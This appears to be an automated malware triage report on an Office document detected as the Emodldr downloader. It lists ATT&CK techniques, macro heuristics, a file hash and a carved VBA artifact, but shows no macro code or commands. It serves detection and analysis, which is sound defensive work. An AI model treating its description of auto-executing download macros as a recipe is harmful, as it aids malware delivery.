MALICIOUS
Risk Score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1105 Ingress Tool Transfer

The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicative of malicious intent. ClamAV detection confirms its malicious nature, identifying it as Emodldr. The macro's primary function appears to be downloading and executing a second-stage payload, as suggested by the 'Ingress Tool Transfer' technique.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 47643 bytes |

SHA-256: 2c211702ab634d7e4a22fd106da79c32444cee646d70462195adb346d2b0c8b3

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 20 long base64-like blob(s))
Preview script: First 1,000 lines of the extracted script